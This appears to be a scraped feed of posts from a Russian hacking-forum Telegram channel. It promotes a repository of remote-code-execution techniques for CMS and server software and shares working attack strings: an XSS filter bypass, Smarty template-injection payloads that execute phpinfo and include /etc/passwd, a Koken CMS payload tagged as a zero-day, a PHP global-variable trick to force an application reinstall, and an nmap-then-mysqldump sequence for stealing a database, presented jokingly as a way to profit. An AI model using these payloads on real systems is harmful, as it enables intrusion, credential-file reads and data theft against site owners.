Официальный канал https://forum.antichat.ru одного из лучших форумов для специалистов в области IT
The goal of this project is to provide an OpenSource knowledge database of all the techniques to achieve Remote Code Execution (RCE) on various applications.Пока не густо:
Joomla SweetRice Typo3 Wordpress FuelCMS Moodle JBoss JoGet Tomcat WildFly GiTea Jenkins LimeSurveyНо PayloadsAllTheThings тоже не сразу строился. И будем надеяться, что больше не придётся скитаться в поисках или ковыряться в закладках по этому поводу 🤞 По возможности коммитим и всячески подбадриваем автора, в том числе звёздочками ⭐️ github.com/p0dalir…chniques
<script/%u0061>alert();</script>JS:
';u0061=alert;1%u0061(document.domain);//#antichat #0day 😢
This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script.CVE-2022-2068
This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 3. Used Gau and url crawlers to find logout pages 4. After collecting logout pages I sent this data to burp suite. 5. I used a param miner on all logout paths. To find parameter Param miner found redirect,url,uri, etc params. Tried open redirect payloads manually. And reported 40 open redirects. Note: I want you to look for an open redirect on a bugcrowd program as they accept it as P4. All of my 40 open redirects were not reported to the bugcrowd. Some reported on h1. Like AT&T accepts open redirects too. Beginner can start with open redirectionТрудно? Нет. И ведь поделом, молодец парень, заслужил! Но ещё не так крут. Мы то с вами знаем кто настоящий король опенредиректов 🤫😎 @
https://expressionengine.com/?this=1 https://www.whmcs.com/members/?this=1 https://www.1c-bitrix.ru/auth/?this=1К чему такие финты приводят, можно почитать на нашем форуме - $this - это специальная переменная. А теперь взгляните на скриншот и попробуйте найти уязвимость. Ответ: https://expressionengine.com/?protected=1&_SERVER=1 Тем самым, в условном проекте использующем эту ветку CI, можно зануллить глобальную переменную $is_installed и переустановить приложение. Вот так, гвозди можно забивать микроскопом. Но как всегда, во всём обвинят PHP 🤷♂️
nmap -p 3306 192.168.1.0/24- Забираем БД:
mysqldump -h 192.168.1.233 -u metaUser -p CURRENT_BUILD_PASSWORD klatch > dump.sql- Открываем свой салон красоты PROFIT! 👙💋❤️
{block name='*/phpinfo();/*'}{/block}
{include file='string:*/include"/etc/passwd";exit;/*' inline=1}http://koken.cms/preview.php?/albums/&preview=elementary/a:<?=phpcredits();?>#0day